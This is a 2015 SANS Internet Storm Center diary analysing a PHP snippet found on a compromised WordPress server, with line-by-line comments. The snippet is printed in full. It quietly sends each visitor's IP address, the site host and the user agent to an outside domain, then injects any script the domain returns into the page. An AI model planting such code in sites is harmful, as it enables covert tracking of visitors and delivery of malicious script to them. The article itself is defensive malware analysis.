Threat Level: green Handler on Duty: Guy Bruneau

SANS ISC Internet Storm Center

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Latest Diaries

ISC StormCast for Wednesday, May 27th 2015

Possible Wordpress Botnet C&C:

Published: 2015-05-26
Last Updated: 2015-05-26 16:36:15 UTC
by Johannes Ullrich (Version: 1)
1 comment(s)

Thanks to one of our readers, for sending us this snipped of PHP he found on a Wordpress server (I added some line breaks and comments in red for readability):


#2b8008#   <-- no idea what this hex value does. I modified it in case it identifies the user submitting this to us.
error_reporting(0); /* turn off error reporting */
@ini_set('display_errors',0);  /* do not display errors to the user */
$wp_mezd8610 = @$_SERVER['HTTP_USER_AGENT']; /* retrieve the user agent string */

/* only run the code if this is Chrome or IE and not a "bot" */

if (( preg_match ('/Gecko|MSIE/i', $wp_mezd8610) && !preg_match ('/bot/i', $wp_mezd8610)))

# Assemble a URL like[client ip]&referer=[server host name]&ua=[user agent]

  $wp_mezd098610="http://"."error"."content".".com/"."content"."/?  ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_mezd8610);

# check if we have the curl extension installed 

if (function_exists('curl_init') && function_exists('curl_exec')) {

$ch= curl_init();
curl_setopt ($ch, CURLOPT_URL,$wp_mezd098610);
curl_setopt ($ch, CURLOPT_TIMEOUT, 20);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$wp_8610mezd = curl_exec ($ch);

# if we don't have curl, try file_get_contents which requires allow_url_fopen.

elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) {$wp_8610mezd = @file_get_contents($wp_mezd098610);}

# or try fopen as a last resort
​elseif (function_exists('fopen') && function_exists('stream_get_contents')) {$wp_8610mezd=@stream_get_contents(@fopen($wp_mezd098610, "r"));}}

if (substr($wp_8610mezd,1,3) === 'scr'){ echo $wp_8610mezd; }

# The data retrieved will be echoed back to the user if it starts with the string "scr".


I haven't been able to retrieve any content from Has anybody else seen this code, or is able to retrieve content from ?

According to whois, is owned by a Chinese organization. It currently resolves to, which is owned by a british ISP. Any help as to the nature of this snippet will be appreciated.

Johannes B. Ullrich, Ph.D.

1 comment(s)
Meet Johannes Ullrich at SANSFIRE!
ISC StormCast for Tuesday, May 26th 2015

If you have more information or corrections regarding our diary, please share.

Recent Diaries

Business Value in "Big Data"
3 days ago by Guy (0 comments)

Exploit kits delivering Necurs
4 days ago by Brad Duncan (8 comments)

Logjam - vulnerabilities in Diffie-Hellman key exchange affect browsers and servers using TLS
6 days ago by Brad Duncan (11 comments)

Upatre/Dyre malspam - Subject: eFax message from "unknown"
6 days ago by Brad Duncan (5 comments)

Lazy Coordinated Attacks Against Old Vulnerabilities
4 decades ago by Dr. J. (1 comment)

View All Diaries →

Latest Discussions

Seeing increased activity against port 5060 on my home pfSense firewall via Snort
created 12 hours ago by Lee (0 replies)

Detecting the New Dridex Malware
created 4 days ago by Mostropi (0 replies)

What is the current Vulnerability targeted by Magnitude Exploit?
created 6 days ago by Mostropi (2 replies)

DShield-Top100 sources list vs the ASCII version
created 6 days ago by JamesW (1 reply)

Dshield shows "Rejected: Not an input block line"
created 1 week ago by Telserv (1 reply)

View All Forums →

Latest News

View All News →